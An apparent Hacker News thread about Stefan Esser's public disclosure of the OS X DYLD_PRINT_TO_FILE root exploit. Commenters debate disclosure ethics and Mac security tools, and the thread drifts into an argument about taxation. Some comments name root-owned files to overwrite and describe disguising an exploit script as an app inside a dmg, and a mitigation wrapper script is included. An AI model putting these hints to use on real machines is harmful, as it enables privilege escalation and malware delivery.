I'm not sure who makes me more cranky: Apple for apparently sitting on the fix, or Stefan Esser for flinging the vulnerability into the breeze for anyone to catch.
Esser has his reasons - "Short reminder: Europeans are not allowed to disclose vulns privately to a foreign company like Apple without registering dual-use export"[1] - but it's hard to believe he couldn't have told them anonymously. Disclosures make careers, though, so there's a strong incentive to go public.
> I'm not sure who makes me more cranky: Apple for apparently sitting on the fix, or Stefan Esser for flinging the vulnerability into the breeze for anyone to catch.
One party makes billions off their users, and will most likely continue their practice of not supporting 3 year old systems even if they are still in wide use for the next time. This should pretty much clear up who is worse.
> Esser has his reasons - "Short reminder: Europeans are not allowed to disclose vulns privately to a foreign company like Apple without registering dual-use export"[1] - but it's hard to believe he couldn't have told them anonymously.
You're suggesting that he should feel ethically obliged to break the law for helping out a company that takes part in the usual tax and labor law evasion tactics (not to mention customer protection evasion in the US)?
>> I'm not sure who makes me more cranky: Apple for apparently sitting on the fix, or Stefan Esser for flinging the vulnerability into the breeze for anyone to catch.
> One party makes billions off their users, and will most likely continue their practice of not supporting 3 year old systems even if they are still in wide use for the next time. This should pretty much clear up who is worse.
I don't agree. I have a six year old Macbook. In those six years I've updated to a new OS about three or four times. One time it has cost me 20 euros, the others were free. Not only that, but updating is a breeze, it's painless and never was a problem. I never had to do a complete reinstall. My mother could have done this. It's clicking a few buttons and that's it.
On top of that, there is no serious degradation in speed. They claim it's even faster, but that probably isn't true for the older hardware. So even if they don't support their three year old OS, you can update your six year old system to the most current one without problem. They could have served these updates as minor ones, but that wouldn't be fun, nothing to show, no new names, no big shows.
> helping out a company that takes part in the usual tax and labor law evasion tactics
Irrelevant. The moral question being raised here is about potentially hurting Apple users via irresponsible behaviour, not about helping Apple itself. Just because Apple does it (by sitting on the problem) does not make it right for other people to put the public at risk as well.
Both parties can be in the wrong at the same time, the behaviour of neither of them is not valid defence for the other.
You do have to be very careful in these cases because of the way the law is set out and how easily companies turn to litigious defence instead of actually fixing problems. In this case I would recommend anonymously informing the controlling party. Of course if he had already done that then things are different and public disclosure is probably the only other thing he could have done.
> The moral question being raised here is about potentially hurting Apple users via irresponsible behaviour
The logical next step is that Apple have been intermittently flippant about security (of late they have improved but their approach is still wholesale unacceptable). Why do users knowingly use an OS with this track record?
> anonymously informing the controlling party
With government surveillance could he have had any guarantee that his disclosure wouldn't have been snooped?
Either way this discussion can be argued ad infinitum. The real villain here is the European Commission for such a brain-dead policy.
>The logical next step is that Apple have been intermittently flippant about security (of late they have improved but their approach is still wholesale unacceptable). Why do users knowingly use an OS with this track record?
Perhaps because ever since 2001 there are 5-6 new stories like this with huge scaremongering headlines and "sky is falling" implications, and then NOTHING absolutely happens, at worse a tiny miniscule of OS X boxes are ever affected, and there are absolutely no implications for 99.9% of users. In the meantime, Apple, even if slow to respond to stuff like this, does improve OS X security infrastructure steadily.
Meanwhile, in the same real world, people have to constantly fight viruses off of Windows boxes (slightly better after 8, but still a real concern).
Btw, no it's not just about "small market share" either. Mac OS had even smaller market share in the late 90s (even 1/10 as small as OSX), but it still had lots of malware and viruses people caught.
> "sky is falling" implications, and then NOTHING absolutely happens
Sure, just brush off a sudo vulnerability.
> fight viruses off of Windows boxes
Virus != vulnerability.
Furthermore, while a rootkit is still a virus it's a long-shot from the relatively benign things running around on Windows machines (not that I mentioned Windows at first, but there ya' go - were on to that now). Just to avoid a Windows shitstorm, the same thing could be said of BSD. I am absolutely certain that there is at least one virus for the platform; however, the damage it could possibly do is seriously mitigated by the security of the platform.
"Viruses" (used as a distinct term to "rootkits") can at worst log a few keys up until your next virus scan. After that, poof! They're gone.
A "rootkit" (which requires a sudo/UAC vulnerability) can also at worst log a few keys or something. When you do your virus scan you're going to find nothing. It's going to sit on your machine until kingdom come because the virus is more privileged than you.
Security is like a backup. You only care about it when you have the random bad experience of actually needing it. I'm sure there are a bunch of Windows users who lament turning off UAC now that their files are all encrypted by ransomware. It has nothing to do with "market share" and has everything to do with risk: "UAC is such a stupid feature."
I could leave my keys in my car ignition every night of my life. No matter how much "market share" that car brand has all it takes is the random misfortune of someone on the street noticing that I do that.
Just keep in mind that it was you that bought up all these tangential topics.
Viruses are not going to go poof unless your antivirus knows about them
And in the typical case a vulnerability is a prerequisite for a virus.
But local vulns are only a concern if someone already has access to your system. In which case your usually fucked anyway. Which is why Apple introduced developer certs and gatekeeper.
If it doesn't impact me, and has never had, I will. Just like I don't feel any need to run antivirus and anti-spyware on my Ubuntu box, whereas I do on any Windows box 1 own (3 of them).
>Virus != vulnerability.*
Well, the vulnerability has to be exploited to matter. Either by some virus, some hackers, some malware, creating a botnet, whatever. If it never does, or its always in the form of some trojan needing a stupid user to install it willingly, I don't care about it.
The mere existance of it is not really important. All systems had, have and will have some vulnerabilities.
I'm not some wide eyed believer in the invulnerability of OS X. I've cut my teeth on Sun OS (pre Solaris) and HP-UX, and I've run Linux since 1997.
I just don't care much for hypotheticals.
As for my data, I back them up. I can go back to a clean system, if anything happens, within 10 minutes with rolling archived bootable backups. And I re-install from scratch + dumb data in around 5 hours (I just did it a few weeks ago to try El Capitan).
>Security is like a backup. You only care about it when you have the random bad experience of actually needing it. I'm sure there are a bunch of Windows users who lament turning off UAC now that their files are all encrypted by ransomware. It has nothing to do with "market share" and has everything to do with risk: "UAC is such a stupid feature."
Well, it's kinda stupid. Even with UAC enabled the same users would just have gone ahead and authorized it to install the malware in the first place, not knowing what it is and just wanting to get it out of the way.
Besides, if they had earlier backups of said files, removing the ramsonware and restoring the original files would be a few minutes affair.
>I could leave my keys in my car ignition every night of my life.
And if you live in certain countries where car theft rarely or never happens, you'll be justified too.
There are countries were people sleep and even leaves their house with the doors unlocked and windows open.
Not because theft is impossible -- just because it's rare enough that barely even registers, and they don't feel any need to be paranoid.
It's a healthy lifestyle, even if 1 in 100.000 has something stolen from time to time.
Heck, it's healthy even if it's you that has had that misfortune.
I have a 2011 Macbook Pro. Sure it doesn't get AppNap or a few other small features, even if I've installed an SSD, but OS-wise I've been able to install all updates since I bought it. It's still supported, especially hardware-wise when I had a couple issues with it.
> Esser has his reasons - "Short reminder: Europeans are not allowed to disclose vulns privately to a foreign company like Apple without registering dual-use export"
I don't think of this as strictly career advancement. I think he is making an important legal and political point. If there were never serious issues while we operate under said laws, then they would never be changed or subject to question either.
Could you explain the dual-use export issue. I read a little about it here [1], but I don't understand. So, if Esser was to contact Apple and provide them with the vulnerability info for free, but with out first registering it as a dual-use export, he could get in trouble? Even if he didn't receive any compensation from Apple? Is that the case?
That's a really sad state of affairs. Instead of promoting security, which is what the law claims to do, the law is actually promoting insecurity. Which is probably the true end goal of the law any way, if that's the way it's written. Threaten people with jail unless they first register security vulnerabilities with the government, than, when they do so, threaten them with even more jail time if they ever speak again about the said vulnerability, and keep the vulnerability for your self. I guess EU is just pissed that NSA has better toys. Really, truly sad state of affairs.
Dynamic linkers trusting variables during setuid operation has long been a place known to be security-sensitive (or alternatively a fruitful source of privilege escalation bugs; see CVE-2010-3847 re LD_AUDIT, http://seclists.org/bugtraq/2004/Aug/281 re LD_DEBUG, CVE-1999-1182 (!) re LD_DEBUG, etc.). The bug had never been particularly hidden from those with a malicious eye.
Frankly, I find myself reading dyld's source code every so often when tracking down something or another with OS X program loading. I'm not saying I would have caught it, but I'm pretty sure I'm not the only one who reads it non-maliciously.
Furthermore, it was fixed in 10.11 betas, so Apple themselves already knew about it [edit: apparently not]:
Repost from the comments in the original article indicates it may have be fixed because apple changed something in the way it handles permissions.
>EdisonCarter 3 days ago
>It's only really "fixed" in El Capitan as a side effect of
Apple introducing the new - and widely reported -
"rootless" security feature which introduces fine grained file permissions.
> Disclosures make careers, though, so there's a strong incentive to go public.
And Apple is doing their part by not emphasizing the role of the person who did disclose responsibly:
This is obviously very bad news. Apple has evidently known about this issue for a while now – not due to Esser, but thanks to a responsible researcher going by the Twitter handle @beist, who had alerted Apple some time before Esser discovered the bug.
As an outside observer, all I see here is: Don't alert Apple.
You forget your key when leaving for work, and don't lock your door. It was accidental, you have a lot on your plate. Your neighbour sees you didn't lock it, and tweets out, "Hey Mike at 321 Greyhat Bvld, you didn't lock your front door". He didn't send that to you as a text, he tweeted it. You come home, and you've been cleaned out.
I'm sure we can all agree, you should have locked your door. Why be mad at your neighbour, he didn't leave the door unlocked, he didn't take your stuff...
A better analogy would be your doorman, whose one job is to watch who gets into your building, leaving the key cabinet unlocked and going to lunch.
I don't mean to blame any individual human here, but I'm baffled at the process by which debugging environment variables were added to dyld without being carefully vetted for bad interactions with setuid binaries. This is a well-known easy place to screw up, and I'm surprised that someone was working on dyld without knowing that (although yes, humans forget things sometimes), and much more surprised that this made it past code review and into a shipping product.
This isn't a random screw up in regular software. dyld is security-sensitive; it's one of the small number of libraries that bears a responsibility to be paranoid about setuid.
I'm sure we can all agree we can make up shit that can happen till the cows come home. I'm not going to act as if someone robbed me until they do. Hold Esser responsible if someone hacks a large number of people because of what he did. Otherwise, stop living a thousands lives.
At least read about responsible disclosure before being so flippant about things like that.
Esser put people at risk. Whether or not anything happens is irrelevant. He put them at risk and we need to recognize that is the cost of full disclosure.
If you're fine with that, cool, but don't pretend he didn't do anything.
> If you're fine with that, cool, but don't pretend he didn't do anything.
Don't speak for me. I never said he did the right thing. I said stop spinning what-ifs about it, but clearly what I should have said is STFU and do something about it. People getting in each other's grill isn't doing something about it. It's blaming others for whatever issues we, as a group, find polarizing.
>That's non-provable until we see it instantiated.
That's not how risk works. I don't even know where to start. If you play a round of Russian Roulette and happen to hit an empty chamber, do you say it's impossible to prove you were at risk? Do you see now how dumb that argument is?
If he publicized a vulnerability, the risk to all of the affected systems is increased. Period.
It's the same way that EMPs are a risk to airlines. If someone releases a method to generate them very easily, they increase the risk to all airlines. You don't have to wait until an airline is brought down before you say the risk was increased.
Well, Apple knew about the vulnerability long before Esser reported it though. So "responsible disclosure" whould have achieved nothing, so we should not be comparing public disclosure to it, but be comparing public disclosure to no disclosure.
Actually that's not a consequence. A consequence is "200K credit cards were stolen and created $50M in losses". Our assumptions (nay, EXPECTATIONS) that we can achieve a perfect record for responsible disclosure is akin to dissonance, which is why this topic is so polarizing. Let's save the judgement of him until we have evidence that shows why what he did is wrong. Until then, this is all a waste of effort.
1) The person who left the house open was certain to get the message quicker because of the tweet than just a text.
2) It was possible to quickly and remotely lock the door. Apple can and should fix this bug very quickly, as that is certainly possible for them.
From the Author in the Comments "In Esser's original post revealing the vulnerability, he said, "At the moment it is unclear if Apple knows about this security problem or not.""
So basically he just released it without disclosure. He claims reasons (see parent post), but its still kinda ick..
Just giving the benefit of the doubt here, a lot of the time it's unclear if your disclosure even made it to the right people in a company or not. No response is the norm for security disclosures, as is claims of "we didn't get this", even if you have a receipt for their ticketing system that says they did. I've sometimes spent far longer attempting to contact a company than doing research into something that seems to be a problem.
It's easy to prove. Just go look at the number of iOS and OSX security fixes attributed to him. Or you can go do a simple search on any reputable site posting security info and you'll see him all over it.
> Stefan Esser for flinging the vulnerability into the breeze for anyone to catch
Then let me help you with this one. The former is responsibility of the worlds most profit corporation with tens of thousands of employees, and the latter is under the responsibility of a random guy on the internet.
Both are in the wrong. The behaviour of neither is a valid defence for the behaviour of the other.
Apple are irresponsible for not addressing the issue in good time (they have known about it for long enough).
This fellow is irresponsible for not following decent "responsible disclosure" procedure. He released information of a serious exploitable problem without first making any attempt to inform the people who could do something about it or otherwise checking to see if they were already aware.
Relative size, income, employment/employee status, and so forth, are all irrelevant here.
You can pin responsibility onto a huge corporation. They can be liable for it. But you cannot control the behavior of random people on the internet without seriously impinging upon the general freedom of people everywhere. So the question of liability and responsibility is irrelevant if placed upon a random individual (unless you want a police state). It's best to hold the huge corporation liable.
>But you cannot control the behavior of random people on the internet without seriously impinging upon the general freedom of people everywhere.
This isn't true at all. Shaming people for unethical or unprofessional actions which they make publicly is quite effective in altering behavior and doesn't require a police state.
So are you suggesting to wait with the disclosure until Apple release a patch? Because there's a good chance that would never happen without it going public.
Apple doesn't really seem to care much about its users once their money has changed hands. Look at how long every iPhone in the world was able to be remotely rebooted via a single text message. That took nearly two months to fix.
They're much more interested in getting you to sign up for their new music service than they are in making sure the devices you use it on are secure.
I'm seriously shocked. This is ridiculous. This looks like possibly the easiest root exploit ever discovered on a desktop OS (a one-liner in bash). Why in the world would they allow an env variable to write to a file in a setuid'd binary?
I'm suddenly very glad I don't use my macbook as my main machine, but I guess I'll remove the set{u,g}id bits on newgrp for now. Don't know if that will break things, but it's better than getting a rootkit.
Not as ridiculous as the response here, which is to bend over backwards to excuse the richest company on the planet, when compared with the scathing responses vulnerabilities in Adobe, Oracle, or Microsoft products receive.
many technologists have the whole suite of Apple products. The have invested thousands of their own money and years of their own time on Apple products. This changes their relationship to the corporation and leads them to defend their investments. To say "you made a bad choice" when someone has invested. so. much. will naturally lead to a defensive response.
Thus, the bending over backwards to excuse the richest company on the planet is very understandable. Especially within HN with it's fair share of early innovator and rich pockets.
It's a good contender, but in 10.2, you could hold down a key in the screen saver lock screen and overflow a buffer, crashing the screensaver and logging you in. Seriously. Not a root exploit but embarrassing.
> That 'fix' is going to break a lot of other stuff.
True, but a short-term replacement along the lines of:
#!/bin/sh
unset DYLD_PRINT_TO_FILE
# Cleanse the sudo arguments here...
# Check MD5 of /etc/sudoers against known good
# value here...
exec /usr/bin/the-renamed-sudo "$@"
Would do the trick when put in the place of /usr/bin/sudo
That `unset` is useless since they don't call sudo to initiate the exploit. The setuid/setgid bits on the newgrp binary are to blame here (combined with the env variable). They could just overwrite your new /usr/bin/sudo file if they wanted to. Hell, they could brick your entire system just out of spite. No sudo necessary.
My point was to show that this very nasty exploit can be mitigated in the short-term by introducing a wrapper script to "protect" setuid programs.
> That `unset` is useless since they don't call sudo to initiate the exploit. The setuid/setgid bits on the newgrp binary are to blame here (combined with the env variable).
You are quite right. In an effort to be concise, the example wrapper unset the environment variable (for completeness) and mentioned checking /etc/sudoers against a known-good hash. I did not properly explain the mitigation strategy and should have stated that wrapping and unsetting the environment variable should be done for all setuid programs. Doing so should block this attack vector until a vendor supplied patch is available.
Is it an ugly hack? Probably. Doable, though, and I believe capable of defending against this particular vulnerability.
I'm not sure why you would bring up Windows 95. Aside from being two decades old, it never claimed to be secure or a multi-user OS. Security-wise, I don't see how it was worse than Apple's contemporary System 7.
I keep asking this question and Mac people keep looking at me like I'm an alien, so I guess I'll turn to the HN community for this questions.
What do you recommend as security software for OSX currently? How do you help secure your devices from public wifi and the internet in general? Especially for novice users?
Security software is a band-aid on vulnerable software and users installing things they shouldn't.
Part of the OSX security strategy is to minimize users installing things they shouldn't by making it difficult (enforced code signing, confirmations when opening an unsigned or new application). The other side is minimizing attack surface for exploits by staying up-to-date, not shipping crap like Java unless the user explicitly needs it, and (increasingly) sandboxing applications to user-approved subsets of the filesystem.
Bolt-on detection and resolution of malware infections is just not a part of the OSX security ecosystem like it is with Windows.
Little Snitch can help give you a picture of what's going on with regard to your network card, but at the end of the day malware can usually hide its traffic in an otherwise-trusted application to avoid that sort of detection.
I believe in defense in depth. There is always going to be an escape. Within the last month there has been several different privilege escalations possible in OSX. While I appreciate OSX having a strong security model, secondary solutions are desirable too me.
So excellent that some malware deletes itself if Little Snitch is even installed (https://www.f-secure.com/v-descs/trojan-downloader_osx_flash...). However, it's worth noting "DYLD_PRINT_TO_FILE" is a root exploit, which may circumvent or disable Little Snitch entirely if used by APT; Little Snitch may not see all network activity. In fact, a root exploit allows one to write malware completely hidden from userland altogether (lsof, ps, tcpdump, etc.) (https://github.com/hackedteam/driver-macos). It is truly scary how vulnerable OS X is at the moment.
As a Little Snitch user, I'm inclined to agree, but I find that I sometimes end up in a state of "WTF wants to use the network now?!" saturation.
My solution for that is to deny anything I don't recognize, and create rules for things I see more than twice, but if you're conditioned to click "OK" on everything you see, Little Snitch isn't going to to much for you...
I really wish Little Snitch could generate aggregate rules for apps. I keep having situations where an app starts making requests over and over until I realize that the developer is using https requests to cdn###.somehost.com where ### is apparently a dozen or more different hosts, and the only option I have is to just allow all https traffic rather than more granular by-host rules.
Although be aware that it can be quite daunting for a novice user. If you're installing for a friend or family member, you should go through all of this apps to whitelist requests and maybe teach them how to identify bad requests, but it's non-trivial. The UI doesn't interact very well with CDNs, for example, sometimes telling you that "App Store" is trying to access "arstechnica.com" because they use the same CDN provider.
Our old infosec guy at work used the icefloor PF management tool at work. It seemed interesting, and I mention it in the vein of the venerable Little Snitch.
I've used both, they're a good start, but any sophisticated rootkit will be able to work under the hood and these tools won't detect it. Also some malware functionality can be injected into legit processes that make use of the network and appear invisible to these filters eyes. http://www.arbingersys.com/osx-injection-override-tutorial-h...
If you really want to monitor what's going in&out of your computer you'll need to use wireshark from other computer in your network... =)
Does anyone know of anything like Little Snitch or ZoneAlarm for Linux? I miss the program-level firewall capabilities of these programs when I'm on Linux.
Remove/Do not install Flash and Java, and make sure that Gatekeeper is at the middle setting. Turn your Firewall on regardless, and/or monitor your network activity. If you know what a packet is, then Little Snitch, if you don't Radio Silence is what I set my parents up with.
"Public wifi", not "your own connection". You have two options for who you decide to trust:
1) A VPN company, who you've had the opportunity to research, who's primary business and reputation is based on handling your traffic.
2) Each and every WAP you connect to, in many cases with no real means to verify it's actually e.g. the official WAP of the hotel you're staying at, for something that likely costs the owners money rather than being seen as a profit center in and of itself. Their primary business and reputation is staked on something completely different than their handling of your traffic (be it their coffee, their accommodations, whatever.)
If you trust #2, statistics eventually comes into play - you will trust someone who shouldn't have been trusted. This also ignores that "public wifi" frequently performs MITM attacks for the... not entirely unreasonable purpose of providing login gateways, terms of use, etc. when you initially open up your web browser. But if you're already MITM traffic, it's not as big a stretch to substitute your own (poorly vetted) advertisements and affiliate links for a little extra revenue. Even if you don't do that, there's no guarantees your MITM tech isn't accidentally weakening security ala Superfish.
I think you put far too much trust in one of thousands of clone VPN services. There's no reputation to taint, there's stock standard scripts running on commodity VPS boxes they rented from somewhere else. I would be shocked if at least some of the most commonly used ones weren't run by people looking to sniff credentials. You're paying to pipe all of your sensitive information through some random persons box, which is just ludicrous.
you should trust your end points. assuming you trust the machine you are using, the other end of the tunnel should be just as trustworthy. that's great if you trust a company; but what incentive do you have to trust them?
As a general rule, I don't use public wifi and council people to use VPN if they must. No flash, disable java in the browser, prefer chrome to safari, AdBlock and NoScript if you don't need JS.
I have removed Flash from my machines but using Chrome over Safari is like kissing your battery goodbye. It does not put the CPU to sleep properly for some tabs. It is sad.
You can set it up to disallow all network traffic until you whitelist the binary. Not sure if it's actually hashing them or just checking the path though.
It still pains me that OSX ships with the firewall disabled by default. I don't think its reasonable to presume that every OSX device will be on a private network behind a NAT, and that everyone else will know to turn their firewall on. However, this appears to be the assumption Apple are making! You can do better!
After spending quite some time deliberating on this, and not wanting my users in the wild without something, I finally settled on Bitdefender. I control clients from the cloud console, can push policies, run scans, updates, all without user interaction. Right now I'm only using the AV part for most devices though, as enabling the full package of internet firewall and website scanning was eating up lots of resources.
The two follow up contenders were ESET and Kaspersky.
Isn't this the time when Mac App Store supposed to shine? When they found something that's dodgy and linked to a company that has apps on App Store, can't they just turn on the kill switch? That way the malware won't have anywhere to direct the users to.
It's not clear whether this "adware installer" is signed by a developer cert. I'm gonna guess it isn't, which means under the default settings, if a user double-clicks it to execute it, they'll be presented with a message saying that the app can't be run because it's "from an unknown developer" and the current settings disallow it. The user can get around that by right-clicking it and choosing "Open" (or switching Gatekeeper to be more relaxed), but the error message doesn't allude to this.
Edit: And if it is signed: yes, I believe Apple could and presumably would push out a malware update that would invalidate the cert.
I'm getting at the fact a shell script with this exploit can be made to look like an "app" and be "double-clickable", and doesn't require any code signing.
Gatekeeper also watches over shell scripts, so when you double click the shell script it will tell you that you can't open it because it is from an unidentified developer.
You're thinking of quarantine. You'll get a warning saying the script was downloaded from the Internet, asking if you're sure you want to open it. Again, nothing to do with code signing.
I think you are misunderstanding something. Shell scripts and unsigned code are treated exactly the same by Gatekeeper.
When you double click a shell script downloaded from the internet, the warning will not ask you if you want to open the file. The warning will tell you that you can't open it because it is from an unidentified developer.
Let me try to clarify this:
"Quarantine" is a flag set on files downloaded from the internet.
When you open a file with the quarantine flag, Gatekeeper checks the code signature. If it is valid, it asks you if you want to open this file that you downloaded from the web. If the code signature is not valid, or if the file has no code signature, you wont be able to open it.
There are several ways to execute shell scripts downloaded from the internet:
1) Check "Allow all Applications" in System Preferences
2) Right click, select open. Then the warning will have a second option to open it despite being unsigned
3) Execute it from the command line
All of these presumably require the user to know what they are doing...
I haven't gotten to try it to confirm but I'm having trouble imagining why an unsigned .app bundle containing a binary executable would get the code-signing error but one containing a script wouldn't. Is that in fact the case?
Sorry for not making this more clear. Create a shell script with the exploit, then remove the .sh extension. You can edit the icon to make it appear as any application and when double-clicked it will open and run in Terminal.app.
Ah, thanks for clarifying. I suppose it wouldn't have execute permissions if downloaded from a browser, but it could if copied with Finder from a network share (or directly accessed, of course), so that sounds like a potential vector.
This is bullshit. If you actually put that disk image on a web server, and then download it, you'll get the unidentified developer warning and you can't run the script (there will be no button to open it).
Gatekeeper and code signing work hand-in-hand. You can run any unsigned code you want, as long as you didn't download it from the web. For example, gatekeeper won't prevent you from running usigned code you compiled yourself, or from running code you installed using a package manager.
OS X is smart enough to know that a shell script is equivalent to an application. You can't fool Gatekeeper quite that easily.
Oh, yeah, I should've thought about dmgs. Yikes... that seems "not OK"; but if they made shell scripts require signing I imagine that'd probably break lots of stuff.
> When they found something that's dodgy and linked to a company that has apps on App Store, can't they just turn on the kill switch? That way the malware won't have anywhere to direct the users to.
If Apple did this you could take down any app from the App Store by writing some malware and making it "advertise" the App Store listing.
Did you check the root directory for a file named "this_system_is_vulnerable"? I just tested this on a mid-2015 MBP running 10.10.4 and found that file in the root directory. :(
Will a major OS vendor ever start taking object-capability ideas seriously? It seems this is part of a class of vulnerabilities that simply couldn't occur under that model.
No, because the vulnerability is that you can write to arbitrary files with root privileges. It turns out that sudoers is the easiest file to write to to gain persistent root, but there are millions of other things: /etc/passwd, /etc/cron.d, /root/.ssh/authorized_keys, any binary that's run by root, etc.
/etc/sudoers is not the only potential target here. Even if that did work, this vulnerability could still brick your entire OS. They could overwrite any file they wanted to.
Would it make sense for the kernel to use a fresh, empty environment when executing a setuid binary?
Or perhaps a fresh environment with a few of the most important variables sanitised and copied over? And perhaps with the old variables available with a prefix (_UNPRIVILEGED_DYLD_PRINT_TO_FILE etc)?
..well, it's not cognitive dissonance - it's not holding two contradictory thoughts, it's more a refusal to believe and more so a defence of investment.
Early innovators, technologists and many Hacker Newsers have spent thousands in both time and money on Apple. To attack Apple attacks their investment leading to defensive behaviour. To think to yourself "oh, now I'm going to ditch Apple and choose Linux" causes psychological harm as you have to 1) admit that your time and money was wasted on Apple 2) You made the wrong choice and 3) You don't want to learn another technology.
Thus it's easier to fight an attacker than to admit defeat.
Dissonance is harder to resolve than it is to 'deal with'. I'd say you are on the mark with your last two statements and wrong about it not being cognitive dissonance. I can only claim that because I spend an inordinate amount of time thinking about it in terms of cloud services and trust. :)
I have to try this if I remember! That'd be very interesting. The console obviously has many legitimate uses. Why wouldn't I try it out if I were thinking about buying a mac?
Do Apple employees not drive cars on roads (paid for by the taxpayer)? Do they rely on no technology whatsoever which did not rely on the taxpayer to exist (for example, er, the internet)? If they want to defend some other part of their property under the law, are they paying their own judges?
Of course Apple avoid taxes - anyone who can do so without fear of getting significantly punished does. But the idea that this is a brave stand against The Man is transparently ridiculous - especially so for any technologist, given our industry's heavy historic reliance on both the academy and the military. Should you pay the mafia for 'protection'? No. Should you pay the security guard for actually protecting you? Yes.
> Do Apple employees not drive cars on roads (paid for by the taxpayer)?
If a mafia built roads, would that make its extortion alright?
> Of course Apple avoid taxes - anyone who can do so without fear of getting significantly punished does
Exactly. Think about that for a while there. You're basically saying that no one would pay taxes without being forced to.
Would anyone pay a mafia protection money without being forced to? That's how extortion works you know.
There you go. Governments force us to pay taxes, exactly because otherwise we wouldn't pay them, which shows how irrelevant all the services provided with extorted money are.
Are you saying the government is extorting in the name of taxes?
Taxes are important because some things ( like laying roads ) cannot be selectively implemented. You can't just ask some to pay for the road and the rest not to use it.
> I'm saying taxation is extortion, and just as immoral as when a mafia does it.
This is a ridiculous comment. I realise the social contract has broken down somewhat in recent years but if you can't see the difference between Mafia extortion and government taxation there's something wrong. Here's just one difference: we can vote for the government.
> Here's just one difference: we can vote for the government.
So what? Go ahead and tell me how and why that matters with regard to taxation itself.
Again, if a mafia let you vote for the new mafia boss, would that make extortion alright? Would it be good to be bossed around by a mafia boss you voted for? Would getting elected make it alright for him to extort you?
You do realize they're still taking your money by force, don't you? What difference does it make that you drop a piece of paper into a box once every few years?
How do you intend to have money without a central bank? Should we all swap gold bars? What if I have a different view of the value of gold/bitcoin?
Also, I'll play along if that's what you want.
> You could just build a road and then ask people to pay for using it
1. I'm going to use your road and not pay. What are you going to do about it?
2. I don't believe you have rights to the land the road is on. How do you prove you have that right?
3. I'm going to build a circular road around a village, then charge $1 trillion for anyone to cross it. Should they starve to death rather then disobey me?
4. I've just shot your best friend in the street because I didn't like the colour of their hair? What are your options?
Please feel free to explain how, in the absence of taxation or joint societal constructs like a government, you're in a good place here?
Incidentally, I've just come back from the Netherlands, where the rather excellent Rotterdam Museum of Customs had a series of quite nicely inquiring exhibits going into exactly why we pay tax and all the nice things it gives to the Netherlands. I wish my own society (the UK) felt more confident about putting forward a pro-taxation argument. Ultimately, it's a kind of social glue that's needed I think.
Also this shouldn't need pointing out, but I did answer at least one of your questions:
> You do realize they're still taking your money by force, don't you?
... with the response:
> How do you intend to have money without a central bank?
I guess I could generalise it to "plus law courts, legal system and police force," if you like.
The real problem you have is that "someone taking your money" assumes you have money in the first place, and there's no such thing as money absent a framework that provides it. Otherwise it's just bits of green paper/coloured metal/bits on a computer.
Or would you like to swap ten chickens for my sheep? No? I think I'll just shoot you and take the chickens anyway then.
And the police? Fire departments? Social security? Town planning/maintenance/social policy/etc etc etc.
Essentially the only system without tax is anarchy, and if you are bona fide advocating that - well I wish you the best of luck in your brave new world.
> You could just build a road and then ask people to pay for using it, much like you can build an iPhone and ask people to pay for one if they want it.
Or much like toll existing roads/bridges [e.g. Golden Gate Bridge, Pennsylvania Turnpike, M6 Toll, German Autobahn (as of 2016)].
Spurious reasoning. You can't negotiate with the mafia, they do not represent your will and they offer no services. If you want to argue that governments do none of these things, then by all means do so via the democratic process. If you want to argue that the mafia DOES, my cousin Vinny would like to meet you for a coffee.
These laws and agreements in your list were heavily lobbied by big corporations including Apple. One of the main reasons why their influence on politics is so big is that they are undertaxed.
Concentration of capital in the possession of one agent is bad because of positive feedback loop. This is why progressive taxation must be applied to corporations like it's applied to people. This is why government's budget must be balanced.
So you think big corporations control the government, but you want the government to tax them so hard that they won't have the money to control the government anymore?
Don't you think they'd bribe politicians not to tax them too hard?
Also, if you tax those hundreds-of-thousands-of-jobs-providing nasty corporations into the ground, lots of people will lose their jobs. How's that for the common good?
I was wondering why Download Shuttle has so many more users than my app (Fat Pipe). Seems like they are playing with the world of adware marketing, I hope they aren't doing weird things with the OS as well :/.
Our app, Download Shuttle, has nothing whatsoever to do with this malware. We have no idea why the malware creator decided to open up Download Shuttle in the Mac App Store.
We can only speculate that it was done in order to disguise what the malware is really doing (installing adware such as Genieo).
Download Shuttle is a free app and makes up an insignificant part of our overall Mac app portfolio. FIPLAB is one of the longest standing app developers on the Mac App Store and our apps have been featured multiple times by Apple themselves.
The top most thing is keeping the OS up to date. And I don't visit shady web sites.
Flash stand alone is removed, and disabled in Chrome. Lastpass for passwords. Tunnelblick+privatetunnel for open networks. And even though I use some software that isn't signed, after I've installed such software I revert the Security & Privacy "allow apps" setting back to app store+identified devs. And relevant, just by coincidence, in this case, I'm using 10.9.5 (which is still currently maintained with security updates).
The reality is that Mac users are simply used to trusting Apple to handle these sorts of things. And it's not a good alternative for that trust to be lost and placed in a 3rd party, e.g. on Windows where trust loss means a litany of 3rd parties to choose from in that space with no real practical way to differentiate, and the Windows Store described as a "cesspool of scams." Apple will get this fixed soon. It's definitely sub-optimal response wise, but I still trust this ecosystem compared to Windows at this point.
Exploits, and high risk vulnerabilities are certainly being closed with security updates. That's their purpose. Major changes aren't practical for Apple, and they do everything they can to incentivize (badger) people into upgrading to the current version.
You can also install another OS. Putting an Ubuntu LTS or Debian stable on it will help you way more, compared to OS X 10.9.5, than any number of other mitigation strategies.
Frankly, I'm way more comfortable taking my Windows 8.1 machine to public wifi hotspots these days than my OS X 10.9 machine.
Oh, yes, obviously use google-chrome (not even chromium; there's too much free-software-purity stuff in the Debian builds to make me feel comfortable with its security profile). At this point it didn't even occur to me you could use another browser and consider yourself secure, such is the awful world we live in.
Esser has his reasons - "Short reminder: Europeans are not allowed to disclose vulns privately to a foreign company like Apple without registering dual-use export"[1] - but it's hard to believe he couldn't have told them anonymously. Disclosures make careers, though, so there's a strong incentive to go public.
[1] https://twitter.com/i0n1c/status/624172774915973120